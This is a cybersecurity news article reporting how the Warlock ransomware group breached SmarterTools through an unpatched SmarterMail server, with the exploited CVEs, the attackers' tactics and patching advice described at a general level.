Warlock Ransomware Exploits Unpatched SmarterMail Server to Breach SmarterTools
In a recent cybersecurity incident, SmarterTools, a provider of communication and collaboration software, fell victim to the Warlock ransomware group, also known as Storm-2603. The breach occurred on January 29, 2026, when attackers exploited an unpatched instance of SmarterMail, the company’s email server software.
Derek Curtis, Chief Commercial Officer at SmarterTools, detailed the circumstances leading to the breach. He explained that the company maintained approximately 30 servers and virtual machines running SmarterMail across its network. However, an employee had set up a virtual machine that was not included in the regular update process. This oversight left the server vulnerable, providing an entry point for the attackers.
Despite the breach, SmarterTools assured that critical services such as their website, shopping cart, My Account portal, and other business applications remained unaffected. No customer account data was compromised during the incident.
The attack impacted about 12 Windows servers within the company’s office network and a secondary data center used for quality control testing. CEO Tim Uzzanti noted that hosted customers using SmarterTrack, the company’s customer service software, were particularly affected. This was not due to vulnerabilities within SmarterTrack itself but because the environment was more accessible once the network was breached.
The attackers demonstrated patience and strategic planning. After gaining initial access, they waited several days before taking control of the Active Directory server, creating new user accounts, and deploying additional malicious payloads, including Velociraptor and file-encrypting ransomware. Curtis highlighted that this delay explains why some customers experienced issues even after updating their systems—the initial breach occurred before the updates, but the malicious activities were triggered later.
The specific vulnerability exploited in SmarterMail remains unidentified. However, it’s noteworthy that several vulnerabilities in the software have been actively exploited in the wild. These include CVE-2025-52691, a critical flaw with a CVSS score of 10.0, and two high-severity vulnerabilities, CVE-2026-23760 and CVE-2026-24423, each with a CVSS score of 9.3.
CVE-2026-23760 is an authentication bypass vulnerability that allows attackers to reset the SmarterMail system administrator password by sending a specially crafted HTTP request. CVE-2026-24423 exploits a weakness in the ConnectToHub API method, enabling unauthenticated remote code execution. SmarterTools addressed these vulnerabilities in build 9511. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has confirmed that CVE-2026-24423 has been exploited in ransomware attacks.
Cybersecurity firm ReliaQuest reported activity likely linked to the Warlock group, involving the exploitation of CVE-2026-23760 to bypass authentication and deploy ransomware on internet-facing systems. The attackers used their initial access to download a malicious MSI installer from Supabase, a legitimate cloud-based backend platform, to install Velociraptor.
Security researcher Alexa Feminella explained that while the vulnerability allows attackers to bypass authentication and reset administrator passwords, Storm-2603 combines this access with SmarterMail’s built-in ‘Volume Mount’ feature to gain full system control. Upon entry, the group installs Velociraptor, a legitimate digital forensics tool they have used in previous campaigns, to maintain access and set the stage for ransomware deployment.
The attackers’ method of chaining vulnerabilities and leveraging legitimate features suggests a sophisticated approach aimed at evading detection. By abusing legitimate functionalities like password resets and drive mounting, they reduce the effectiveness of detections tuned specifically for known remote code execution patterns.
This incident underscores the critical importance of maintaining up-to-date software and promptly applying security patches. Organizations are advised to upgrade to the latest version of SmarterMail (Build 9526) immediately to ensure optimal protection. Additionally, isolating mail servers can help block lateral movement attempts used to deploy ransomware.
The Warlock ransomware group has a history of exploiting unpatched systems. In previous campaigns, they have targeted vulnerabilities in SharePoint servers to deploy ransomware. Their tactics often involve exploiting known vulnerabilities shortly after patches are released, highlighting the need for organizations to stay vigilant and proactive in their cybersecurity measures.
The misuse of legitimate tools like Velociraptor by threat actors further complicates the cybersecurity landscape. While such tools are designed for digital forensics and incident response, in the wrong hands, they can be repurposed for malicious activities. This dual-use nature of cybersecurity tools necessitates careful monitoring and control over their deployment within organizational networks.
In conclusion, the breach of SmarterTools by the Warlock ransomware group serves as a stark reminder of the ever-evolving tactics employed by cybercriminals. It emphasizes the necessity for organizations to maintain rigorous patch management practices, monitor for unauthorized system changes, and educate employees about the risks associated with unpatched software and unauthorized system configurations.
